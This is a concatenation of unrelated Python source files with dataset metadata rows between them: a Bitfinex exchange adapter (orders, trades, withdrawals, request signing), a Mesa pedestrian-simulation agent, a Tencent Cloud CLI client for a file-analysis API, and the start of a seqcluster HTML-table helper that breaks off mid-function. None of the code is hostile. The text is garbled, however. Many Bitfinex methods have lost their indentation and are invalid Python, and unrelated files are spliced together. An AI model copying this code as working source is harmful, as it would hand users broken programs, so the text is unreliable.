        if market is not None:
            symbol = market['symbol']
        elif 'pair' in ticker:
            marketId = self.safe_string(ticker, 'pair')
            if marketId is not None:
                if marketId in self.markets_by_id:
                    market = self.markets_by_id[marketId]
                    symbol = market['symbol']
                else:
                    # unknown market id: assume a 3+3 character base/quote split
                    baseId = marketId[0:3]
                    quoteId = marketId[3:6]
                    base = self.safe_currency_code(baseId)
                    quote = self.safe_currency_code(quoteId)
                    symbol = base + '/' + quote
        last = self.safe_float(ticker, 'last_price')
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': self.safe_float(ticker, 'high'),
            'low': self.safe_float(ticker, 'low'),
            'bid': self.safe_float(ticker, 'bid'),
            'bidVolume': None,
            'ask': self.safe_float(ticker, 'ask'),
            'askVolume': None,
            'vwap': None,
            'open': None,
            'close': last,
            'last': last,
            'previousClose': None,
            'change': None,
            'percentage': None,
            'average': self.safe_float(ticker, 'mid'),
            'baseVolume': self.safe_float(ticker, 'volume'),
            'quoteVolume': None,
            'info': ticker,
        }
    def parse_trade(self, trade, market):
        """Convert a raw bitfinex trade (public or private) into the unified trade structure."""
        id = self.safe_string(trade, 'tid')
        # seconds -> milliseconds
        timestamp = self.safe_float(trade, 'timestamp')
        if timestamp is not None:
            timestamp = int(timestamp) * 1000
        type = None
        side = self.safe_string_lower(trade, 'type')
        orderId = self.safe_string(trade, 'order_id')
        price = self.safe_float(trade, 'price')
        amount = self.safe_float(trade, 'amount')
        cost = None
        if price is not None:
            if amount is not None:
                cost = price * amount
        fee = None
        # only private (my-trades) responses carry fee fields
        if 'fee_amount' in trade:
            # bitfinex reports fees as negative amounts; flip the sign
            feeCost = -self.safe_float(trade, 'fee_amount')
            feeCurrencyId = self.safe_string(trade, 'fee_currency')
            feeCurrencyCode = self.safe_currency_code(feeCurrencyId)
            fee = {
                'cost': feeCost,
                'currency': feeCurrencyCode,
            }
        return {
            'id': id,
            'info': trade,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': market['symbol'],
            'type': type,
            'order': orderId,
            'side': side,
            'takerOrMaker': None,
            'price': price,
            'amount': amount,
            'cost': cost,
            'fee': fee,
        }
def fetch_trades(self, symbol, since=None, limit=50, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'limit_trades': limit,
}
if since is not None:
request['timestamp'] = int(since / 1000)
response = self.publicGetTradesSymbol(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit_trades'] = limit
if since is not None:
request['timestamp'] = int(since / 1000)
response = self.privatePostMytrades(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place a new order.

        The unified order *type* is mapped through options['orderTypes']
        (e.g. 'limit' -> 'exchange limit'). Bitfinex requires a price field
        even for market orders, so a dummy unique value (the nonce) is sent.
        """
        self.load_markets()
        request = {
            'symbol': self.market_id(symbol),
            'side': side,
            'amount': self.amount_to_precision(symbol, amount),
            'type': self.safe_string(self.options['orderTypes'], type, type),
            'ocoorder': False,
            'buy_price_oco': 0,
            'sell_price_oco': 0,
        }
        if type == 'market':
            # dummy price, ignored by the exchange for market orders
            request['price'] = str(self.nonce())
        else:
            request['price'] = self.price_to_precision(symbol, price)
        response = self.privatePostOrderNew(self.extend(request, params))
        return self.parse_order(response)
    def edit_order(self, id, symbol, type, side, amount=None, price=None, params={}):
        """Cancel-and-replace an existing order; only the provided fields are sent."""
        self.load_markets()
        order = {
            'order_id': int(id),
        }
        if price is not None:
            order['price'] = self.price_to_precision(symbol, price)
        if amount is not None:
            order['amount'] = self.number_to_string(amount)
        if symbol is not None:
            order['symbol'] = self.market_id(symbol)
        if side is not None:
            order['side'] = side
        if type is not None:
            # map unified order types through options['orderTypes']
            order['type'] = self.safe_string(self.options['orderTypes'], type, type)
        response = self.privatePostOrderCancelReplace(self.extend(order, params))
        return self.parse_order(response)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'order_id': int(id),
}
return self.privatePostOrderCancel(self.extend(request, params))
    def cancel_all_orders(self, symbol=None, params={}):
        """Cancel every open order; the *symbol* argument is ignored by this endpoint."""
        return self.privatePostOrderCancelAll(params)
    def parse_order(self, order, market=None):
        """Convert a raw bitfinex order dict into the unified order structure."""
        side = self.safe_string(order, 'side')
        open = self.safe_value(order, 'is_live')
        canceled = self.safe_value(order, 'is_cancelled')
        # live -> open, cancelled -> canceled, anything else -> closed
        status = None
        if open:
            status = 'open'
        elif canceled:
            status = 'canceled'
        else:
            status = 'closed'
        symbol = None
        if market is None:
            marketId = self.safe_string_upper(order, 'symbol')
            if marketId is not None:
                if marketId in self.markets_by_id:
                    market = self.markets_by_id[marketId]
        if market is not None:
            symbol = market['symbol']
        # strip the 'exchange ' prefix off types like 'exchange limit'
        orderType = order['type']
        exchange = orderType.find('exchange ') >= 0
        if exchange:
            parts = order['type'].split(' ')
            orderType = parts[1]
        # seconds -> milliseconds
        timestamp = self.safe_float(order, 'timestamp')
        if timestamp is not None:
            timestamp = int(timestamp) * 1000
        id = self.safe_string(order, 'id')
        return {
            'info': order,
            'id': id,
            'clientOrderId': None,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'lastTradeTimestamp': None,
            'symbol': symbol,
            'type': orderType,
            'timeInForce': None,
            'postOnly': None,
            'side': side,
            'price': self.safe_float(order, 'price'),
            'stopPrice': None,
            'average': self.safe_float(order, 'avg_execution_price'),
            'amount': self.safe_float(order, 'original_amount'),
            'remaining': self.safe_float(order, 'remaining_amount'),
            'filled': self.safe_float(order, 'executed_amount'),
            'status': status,
            'fee': None,
            'cost': None,
            'trades': None,
        }
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if symbol is not None:
if not (symbol in self.markets):
raise ExchangeError(self.id + ' has no symbol ' + symbol)
response = self.privatePostOrders(params)
orders = self.parse_orders(response, None, since, limit)
if symbol is not None:
orders = self.filter_by(orders, 'symbol', symbol)
return orders
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
if limit is not None:
request['limit'] = limit
response = self.privatePostOrdersHist(self.extend(request, params))
orders = self.parse_orders(response, None, since, limit)
if symbol is not None:
orders = self.filter_by(orders, 'symbol', symbol)
orders = self.filter_by_array(orders, 'status', ['closed', 'canceled'], False)
return orders
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'order_id': int(id),
}
response = self.privatePostOrderStatus(self.extend(request, params))
return self.parse_order(response)
    def parse_ohlcv(self, ohlcv, market=None):
        """Reorder a raw v2 candle into the unified [timestamp, open, high, low, close, volume].

        Bitfinex v2 candles arrive as [MTS, OPEN, CLOSE, HIGH, LOW, VOLUME],
        hence the 0, 1, 3, 4, 2, 5 index order below.
        """
        #
        # [
        #     1457539800000,  # MTS (ms)
        #     0.02594,  # open
        #     0.02594,  # close
        #     0.02594,  # high
        #     0.02594,  # low
        #     0.1  # volume
        # ]
        #
        return [
            self.safe_integer(ohlcv, 0),
            self.safe_float(ohlcv, 1),
            self.safe_float(ohlcv, 3),
            self.safe_float(ohlcv, 4),
            self.safe_float(ohlcv, 2),
            self.safe_float(ohlcv, 5),
        ]
    def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
        """Fetch OHLCV candles from the v2 candles endpoint.

        v2 market ids are the v1 id prefixed with 't'; results are requested
        in ascending order (sort=1), capped at *limit* (default 100).
        """
        self.load_markets()
        if limit is None:
            limit = 100
        market = self.market(symbol)
        v2id = 't' + market['id']
        request = {
            'symbol': v2id,
            'timeframe': self.timeframes[timeframe],
            'sort': 1,
            'limit': limit,
        }
        if since is not None:
            request['start'] = since
        response = self.v2GetCandlesTradeTimeframeSymbolHist(self.extend(request, params))
        # sample response:
        # [
        #     [1457539800000,0.02594,0.02594,0.02594,0.02594,0.1],
        #     [1457547300000,0.02577,0.02577,0.02577,0.02577,0.01],
        #     [1457550240000,0.0255,0.0253,0.0255,0.0252,3.2640000000000002],
        # ]
        return self.parse_ohlcvs(response, market, timeframe, since, limit)
def get_currency_name(self, code):
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
if code in self.options['currencyNames']:
return self.options['currencyNames'][code]
raise NotSupported(self.id + ' ' + code + ' not supported for withdrawal')
def create_deposit_address(self, code, params={}):
self.load_markets()
request = {
'renew': 1,
}
response = self.fetch_deposit_address(code, self.extend(request, params))
return response
    def fetch_deposit_address(self, code, params={}):
        """Fetch (or, with renew=1, regenerate) the exchange-wallet deposit address for *code*."""
        self.load_markets()
        # todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
        name = self.get_currency_name(code)
        request = {
            'method': name,
            'wallet_name': 'exchange',
            'renew': 0,  # a value of 1 will generate a new address
        }
        response = self.privatePostDepositNew(self.extend(request, params))
        address = self.safe_value(response, 'address')
        tag = None
        # for pooled-address currencies the 'address' field is actually the
        # tag/memo and 'address_pool' holds the shared address
        if 'address_pool' in response:
            tag = address
            address = response['address_pool']
        self.check_address(address)
        return {
            'currency': code,
            'address': address,
            'tag': tag,
            'info': response,
        }
    def fetch_transactions(self, code=None, since=None, limit=None, params={}):
        """Fetch deposit/withdrawal history for one currency.

        The currency may be given either as a unified *code* or as a raw
        params['currency'] id; one of the two is required.
        """
        self.load_markets()
        currencyId = self.safe_string(params, 'currency')
        query = self.omit(params, 'currency')
        currency = None
        if currencyId is None:
            if code is None:
                raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument or a `currency` parameter')
            else:
                currency = self.currency(code)
                currencyId = currency['id']
        query['currency'] = currencyId
        if since is not None:
            # the endpoint expects seconds
            query['since'] = int(since / 1000)
        # NOTE(review): extending `query` with the original `params` re-adds the
        # 'currency' key that omit() removed above (same value, so harmless,
        # but the omit() looks redundant) — confirm before simplifying
        response = self.privatePostHistoryMovements(self.extend(query, params))
        # sample response:
        # [
        #     {
        #         "id":581183,
        #         "txid": 123456,
        #         "currency":"BTC",
        #         "method":"BITCOIN",
        #         "type":"WITHDRAWAL",
        #         "amount":".01",
        #         "description":"3QXYWgRGX2BPYBpUDBssGbeWEa5zq6snBZ, offchain transfer ",
        #         "address":"3QXYWgRGX2BPYBpUDBssGbeWEa5zq6snBZ",
        #         "status":"COMPLETED",
        #         "timestamp":"1443833327.0",
        #         "timestamp_created": "1443833327.1",
        #         "fee": 0.1,
        #     }
        # ]
        return self.parse_transactions(response, currency, since, limit)
    def parse_transaction(self, transaction, currency=None):
        """Convert a raw bitfinex movement into the unified transaction structure."""
        #
        # crypto
        #
        #     {
        #         "id": 12042490,
        #         "fee": "-0.02",
        #         "txid": "EA5B5A66000B66855865EFF2494D7C8D1921FCBE996482157EBD749F2C85E13D",
        #         "type": "DEPOSIT",
        #         "amount": "2099.849999",
        #         "method": "RIPPLE",
        #         "status": "COMPLETED",
        #         "address": "2505189261",
        #         "currency": "XRP",
        #         "timestamp": "1551730524.0",
        #         "description": "EA5B5A66000B66855865EFF2494D7C8D1921FCBE996482157EBD749F2C85E13D",
        #         "timestamp_created": "1551730523.0"
        #     }
        #
        # fiat
        #
        #     {
        #         "id": 12725095,
        #         "fee": "-60.0",
        #         "txid": null,
        #         "type": "WITHDRAWAL",
        #         "amount": "9943.0",
        #         "method": "WIRE",
        #         "status": "SENDING",
        #         "address": null,
        #         "currency": "EUR",
        #         "timestamp": "1561802484.0",
        #         "description": "Name: bob, AccountAddress: some address, Account: someaccountno, Bank: bank address, SWIFT: foo, Country: UK, Details of Payment: withdrawal name, Intermediary Bank Name: , Intermediary Bank Address: , Intermediary Bank City: , Intermediary Bank Country: , Intermediary Bank Account: , Intermediary Bank SWIFT: , Fee: -60.0",
        #         "timestamp_created": "1561716066.0"
        #     }
        #
        # creation time is used as the unified timestamp; the plain
        # 'timestamp' field is the last update (seconds -> milliseconds)
        timestamp = self.safe_float(transaction, 'timestamp_created')
        if timestamp is not None:
            timestamp = int(timestamp * 1000)
        updated = self.safe_float(transaction, 'timestamp')
        if updated is not None:
            updated = int(updated * 1000)
        currencyId = self.safe_string(transaction, 'currency')
        code = self.safe_currency_code(currencyId, currency)
        type = self.safe_string_lower(transaction, 'type')  # DEPOSIT or WITHDRAWAL
        status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
        # fees are reported negative; expose them as positive costs
        feeCost = self.safe_float(transaction, 'fee')
        if feeCost is not None:
            feeCost = abs(feeCost)
        return {
            'info': transaction,
            'id': self.safe_string(transaction, 'id'),
            'txid': self.safe_string(transaction, 'txid'),
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'address': self.safe_string(transaction, 'address'),  # todo: this is actually the tag for XRP transfers(the address is missing)
            'tag': None,  # refix it properly for the tag from description
            'type': type,
            'amount': self.safe_float(transaction, 'amount'),
            'currency': code,
            'status': status,
            'updated': updated,
            'fee': {
                'currency': code,
                'cost': feeCost,
                'rate': None,
            },
        }
def parse_transaction_status(self, status):
statuses = {
'SENDING': 'pending',
'CANCELED': 'canceled',
'ZEROCONFIRMED': 'failed', # ZEROCONFIRMED happens e.g. in a double spend attempt(I had one in my movementsnot )
'COMPLETED': 'ok',
}
return self.safe_string(statuses, status, status)
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
name = self.get_currency_name(code)
request = {
'withdraw_type': name,
'walletselected': 'exchange',
'amount': self.number_to_string(amount),
'address': address,
}
if tag is not None:
request['payment_id'] = tag
responses = self.privatePostWithdraw(self.extend(request, params))
response = responses[0]
id = self.safe_string(response, 'withdrawal_id')
message = self.safe_string(response, 'message')
errorMessage = self.find_broadly_matched_key(self.exceptions['broad'], message)
if id == 0:
if errorMessage is not None:
ExceptionClass = self.exceptions['broad'][errorMessage]
raise ExceptionClass(self.id + ' ' + message)
raise ExchangeError(self.id + ' withdraw returned an id of zero: ' + self.json(response))
return {
'info': response,
'id': id,
}
def fetch_positions(self, symbols=None, since=None, limit=None, params={}):
self.load_markets()
response = self.privatePostPositions(params)
#
# [
# {
# "id":943715,
# "symbol":"btcusd",
# "status":"ACTIVE",
# "base":"246.94",
# "amount":"1.0",
# "timestamp":"1444141857.0",
# "swap":"0.0",
# "pl":"-2.22042"
# }
# ]
#
# todo unify parsePosition/parsePositions
return response
    def nonce(self):
        """Nonce for signed private requests: the current time in milliseconds."""
        return self.milliseconds()
    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the final url/method/body/headers for a request.

        Public and */hist* endpoints pass parameters in the query string;
        private endpoints send a JSON body (with nonce and request path)
        signed with HMAC-SHA384 via the X-BFX-* headers.
        """
        request = '/' + self.implode_params(path, params)
        # v2 endpoints are prefixed with the api name, v1 with the version
        if api == 'v2':
            request = '/' + api + request
        else:
            request = '/' + self.version + request
        query = self.omit(params, self.extract_params(path))
        url = self.urls['api'][api] + request
        if (api == 'public') or (path.find('/hist') >= 0):
            if query:
                suffix = '?' + self.urlencode(query)
                url += suffix
                request += suffix
        if api == 'private':
            self.check_required_credentials()
            nonce = self.nonce()
            query = self.extend({
                'nonce': str(nonce),
                'request': request,
            }, query)
            body = self.json(query)
            # the signature covers the base64-encoded JSON payload
            payload = self.string_to_base64(body)
            secret = self.encode(self.secret)
            signature = self.hmac(payload, secret, hashlib.sha384)
            headers = {
                'X-BFX-APIKEY': self.apiKey,
                'X-BFX-PAYLOAD': self.decode(payload),
                'X-BFX-SIGNATURE': signature,
                'Content-Type': 'application/json',
            }
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
if code >= 400:
if body[0] == '{':
feedback = self.id + ' ' + body
message = self.safe_string_2(response, 'message', 'error')
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(feedback) # unknown message
| 40.401496 | 426 | 0.456968 |
88566ac20266e896964e385e3e424097743bffdd | 4,933 | py | Python | abm/dda-mesa/dda-mesa/agent.py | nickmalleson/surf | d6b8abb75635ac0fbadb445e67fc50ccb8b19945 | [
"MIT"
] | 3 | 2018-09-15T03:16:33.000Z | 2020-07-11T00:50:39.000Z | abm/dda-mesa/dda-mesa/agent.py | nickmalleson/surf | d6b8abb75635ac0fbadb445e67fc50ccb8b19945 | [
"MIT"
] | null | null | null | abm/dda-mesa/dda-mesa/agent.py | nickmalleson/surf | d6b8abb75635ac0fbadb445e67fc50ccb8b19945 | [
"MIT"
] | 10 | 2016-08-25T13:38:57.000Z | 2021-02-01T10:20:01.000Z | from mesa import Agent
import random
class DDAAgent(Agent):
    """Default DDA agent: walks along a 1D street between endpoints A and B."""

    def __init__(self, unique_id, model):
        """Initialise an agent with a unique_id and a reference to the model"""
        super().__init__(unique_id, model)
        # Agents need a state - this will be set by the model when the agent is created
        self.state = None
        # Each should have a colour for display (doesn't affect the analysis)
        self.colour = random.choice(["red", "blue", "green", "yellow", "orange", "pink", "green", "purple"])

    def step(self):
        """Step the agent: move one cell toward the destination, retiring at
        the far endpoint or (probabilistically) at the midpoint."""
        # Note: the other agents are available via self.model.schedule.agents
        if self.state == AgentStates.RETIRED:  # Don't do anything if the agent is retired.
            return
        x, y = self.pos  # The agent's position
        # If the agent has reached their destination then they can retire to the graveyard,
        # passing the camera at the exit on their way out
        if self.state == AgentStates.TRAVELLING_FROM_A and self.pos == self.model.loc_b:
            self.model.increment_camera_b()
            self.retire()
            return
        elif self.state == AgentStates.TRAVELLING_FROM_B and self.pos == self.model.loc_a:
            self.model.increment_camera_a()
            self.retire()
            return
        # See if they should leave through the midpoint
        if self.pos == self.model.loc_mid:
            if random.random() > self.model.bleedout_rate:
                self.model.increment_camera_m()  # Tell the midpoint camera that they're leaving
                self.retire()
                return
        # Otherwise move one cell away from the endpoint they started at
        if self.state == AgentStates.TRAVELLING_FROM_A:
            self.model.grid.move_agent(self, ((x + 1), 0))  # Move 1 to the right (away from A)
        elif self.state == AgentStates.TRAVELLING_FROM_B:
            self.model.grid.move_agent(self, ((x - 1), 0))  # Move 1 to the left (away from B)
        # XXXX WHAT ABOUT LEAVING FROM THE GRAVEYARD

    def activate(self):
        """Take this agent from a RETIRED state into an ACTIVE state (i.e. moving in the street)"""
        # Choose a location (either endpoint A or B) and move the agent there
        start = random.choice([self.model.loc_a, self.model.loc_b])
        self.model.grid.move_agent(self, start)
        # Change their state and tell the relevant model camera that they are passing it
        if start == self.model.loc_a:
            self.state = AgentStates.TRAVELLING_FROM_A
            self.model.increment_camera_a()
        else:
            self.state = AgentStates.TRAVELLING_FROM_B
            self.model.increment_camera_b()

    def retire(self):
        """Make this agent RETIRE (move it to the graveyard cell)"""
        self.model.grid.move_agent(self, self.model.graveyard)
        self.state = AgentStates.RETIRED

    def __repr__(self):
        return "DDAAgent {} (state {})".format(self.unique_id, self.state)

    # Other useful functions, for reference more than anything else

    @classmethod
    def _get_rand_neighbour_cell(cls, agent):
        """Get a neighbouring cell at random. Don't use this, it's very expensive.
        Included here for reference (it's the 'proper' mesa way of doing it"""
        x, y = agent.pos  # (pos is updated by grid.place_agent method when they are initialised in Model)
        possible_steps = agent.model.grid.get_neighborhood(
            agent.pos,
            moore=True,
            include_center=True)
        return random.choice(possible_steps)

    def _agents_with_me(self):
        """Get the agents on the same cell as me (as a list)"""
        # fixed: the result was computed but never returned (always gave None)
        return self.model.grid.get_cell_list_contents([self.pos])

    def _agents_near_me(self):
        """Get agents near me (as a list)"""
        # fixed: the result was computed but never returned (always gave None)
        return self.model.grid.get_neighbors(self.pos, moore=True, include_center=False, radius=1)
class AgentStates:
    """Enumeration of the states a DDAAgent can be in."""
    RETIRED = 0
    TRAVELLING_FROM_A = 1
    TRAVELLING_FROM_B = 2
| 41.805085 | 108 | 0.62538 |
5da9fa0411f97f9e5a4e175a9c22d85cf83c4088 | 6,030 | py | Python | tccli/services/habo/habo_client.py | zqfan/tencentcloud-cli | b6ad9fced2a2b340087e4e5522121d405f68b615 | [
"Apache-2.0"
] | null | null | null | tccli/services/habo/habo_client.py | zqfan/tencentcloud-cli | b6ad9fced2a2b340087e4e5522121d405f68b615 | [
"Apache-2.0"
] | null | null | null | tccli/services/habo/habo_client.py | zqfan/tencentcloud-cli | b6ad9fced2a2b340087e4e5522121d405f68b615 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.habo.v20181203 import habo_client as habo_client_v20181203
from tencentcloud.habo.v20181203 import models as models_v20181203
def doStartAnalyse(args, parsed_globals):
    """CLI action: call the habo StartAnalyse API with *args* and print the response."""
    g_param = parse_global_arg(parsed_globals)

    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].HaboClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)

    model = MODELS_MAP[version].StartAnalyseRequest()
    model.from_json_string(json.dumps(args))
    result = client.StartAnalyse(model).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # some runtimes return bytes; decode before parsing (python3.3)
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStatus(args, parsed_globals):
    """CLI action: call the habo DescribeStatus API with *args* and print the response."""
    g_param = parse_global_arg(parsed_globals)

    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout is None else int(timeout),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")

    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].HaboClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)

    model = MODELS_MAP[version].DescribeStatusRequest()
    model.from_json_string(json.dumps(args))
    result = client.DescribeStatus(model).to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # some runtimes return bytes; decode before parsing (python3.3)
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
# Maps from the "vYYYYMMDD" API version tag to the SDK client / model modules.
CLIENT_MAP = {
    "v20181203": habo_client_v20181203,

}

MODELS_MAP = {
    "v20181203": models_v20181203,

}

# CLI action name -> handler function dispatch table.
ACTION_MAP = {
    "StartAnalyse": doStartAnalyse,
    "DescribeStatus": doDescribeStatus,

}

# API versions this command-line module supports.
AVAILABLE_VERSION_LIST = [
    "v20181203",

]
def action_caller():
    # Expose the action-name -> handler mapping to the CLI dispatcher.
    return ACTION_MAP
def parse_global_arg(parsed_globals):
    """Resolve global CLI options into a complete parameter dict.

    Fills missing values in *parsed_globals* (mutated in place and returned)
    from, in order: the selected profile's ~/.tccli/<profile>.configure and
    .credential files, and — when no profile was given — the TENCENTCLOUD_*
    environment variables. Raises ConfigurationError on malformed or
    incomplete configuration.
    """
    g_param = parsed_globals
    is_exist_profile = True
    if not parsed_globals["profile"]:
        is_exist_profile = False
        g_param["profile"] = "default"

    configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
    is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
    is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")

    conf = {}
    cred = {}

    if is_conf_exist:
        conf = Utils.load_json_msg(conf_path)
    if is_cred_exist:
        cred = Utils.load_json_msg(cred_path)

    if not (isinstance(conf, dict) and isinstance(cred, dict)):
        raise ConfigurationError(
            "file: %s or %s is not json format"
            % (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))

    if OptionsDefine.Token not in cred:
        cred[OptionsDefine.Token] = None

    # environment variables are only consulted when no explicit profile was given
    if not is_exist_profile:
        if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
            cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
            cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
            cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)

        if os.environ.get(OptionsDefine.ENV_REGION):
            conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)

    # backfill any still-missing globals from the credential / configure files
    for param in g_param.keys():
        if g_param[param] is None:
            if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
                if param in cred:
                    g_param[param] = cred[param]
                else:
                    raise ConfigurationError("%s is invalid" % param)
            elif param in [OptionsDefine.Region, OptionsDefine.Output]:
                if param in conf:
                    g_param[param] = conf[param]
                else:
                    raise ConfigurationError("%s is invalid" % param)

    try:
        # an explicit --service-version wins over the configured default
        if g_param[OptionsDefine.ServiceVersion]:
            g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
        else:
            version = conf["habo"][OptionsDefine.Version]
            g_param[OptionsDefine.Version] = "v" + version.replace('-', '')

        if g_param[OptionsDefine.Endpoint] is None:
            g_param[OptionsDefine.Endpoint] = conf["habo"][OptionsDefine.Endpoint]
    except Exception as err:
        raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))

    if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
        raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))

    return g_param
| 36.993865 | 105 | 0.696849 |
60f82d75d1c71227b9c9d63fa12af51e571b9f33 | 3,045 | py | Python | seqcluster/libs/table.py | kkarolis/seqcluster | 774e23add8cd4fdc83d626cea3bd1f458e7d060d | [
"MIT"
] | 33 | 2015-01-26T23:18:01.000Z | 2022-01-07T21:40:49.000Z | seqcluster/libs/table.py | kkarolis/seqcluster | 774e23add8cd4fdc83d626cea3bd1f458e7d060d | [
"MIT"
] | 44 | 2015-01-21T17:43:42.000Z | 2021-08-25T15:49:18.000Z | seqcluster/libs/table.py | kkarolis/seqcluster | 774e23add8cd4fdc83d626cea3bd1f458e7d060d | [
"MIT"
] | 18 | 2015-05-18T15:34:32.000Z | 2021-02-10T17:58:24.000Z | from seqcluster.libs.seqviz import seqviz
START1= '''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>clusters information</title>
<style type="text/css" title="currentStyle">
@import "../css/info_css.css";
</style>
<script type="text/javascript">
function showstuff(boxid){
document.getElementById(boxid).style.visibility="visible";
}
function hidestuff(boxid){
document.getElementById(boxid).style.visibility="hidden";
}
</script>
<script src="../js/Scribl.1.1.4.min.js" ></script>
<script src="../js/jquery.min.js"></script>
<script src="../js/jquery-ui.min.js"></script>
<link href="../js/jquery-ui.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../js/dragscrollable.js"></script>
<style>
#scribl-zoom-slider {
width: 4px;
}
</style>
'''
START2='''
</head>
<body id="cluster">
'''
JSSTART= '''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>clusters information</title>
<style type="text/css" title="currentStyle">@import "css/demo_page.css"; @import "css/jquery.dataTables.css";</style><script type="text/javascript" language="javascript" src="js/jquery.js"></script>
<script type="text/javascript" language="javascript" src="js/jquery.dataTables.js"></script><script type="text/javascript" charset="utf-8">$(document).ready(function() { $('#table').dataTable();} );</script>
</head>
<body id="dt_example">
'''
END="</body></html>"
STABLE='<table cellpadding="0" cellspacing="0" border="0" class="info" id="table" width="500px">'
SHR="<tr>"
ETABLE="</tbody></table>"
EHR="</tr>\n"
HEADER_SEQ=["sequence","size"]
HEADER_L=["position","annotation (element:strand)-(distance to 5,distance to 3)"]
def tab2table(file, output):
    """Scan a tab-separated file (currently a stub).

    Reads the header line, then iterates the remaining lines splitting them
    on tabs.  The parsed values are not yet used; the function only validates
    that the file can be read.

    Args:
        file: Path of the tab-separated input file.  (Name kept for
            backward compatibility even though it shadows a builtin.)
        output: Unused placeholder for a future output path.

    Returns:
        0 on success.
    """
    # Context manager guarantees the handle is closed even if reading raises
    # (the original opened/closed manually and leaked on exception).
    with open(file, 'r') as f:
        header = f.readline().strip()
        for line in f:
            cols = line.strip().split("\t")
    return 0
def make_cell(cell):
    """Wrap *cell* in a table-data (<td>) tag."""
    return f"<td>{cell!s}</td>"
def make_hs_link(id):
    """Build the show/hide anchor pair that toggles the element *id*."""
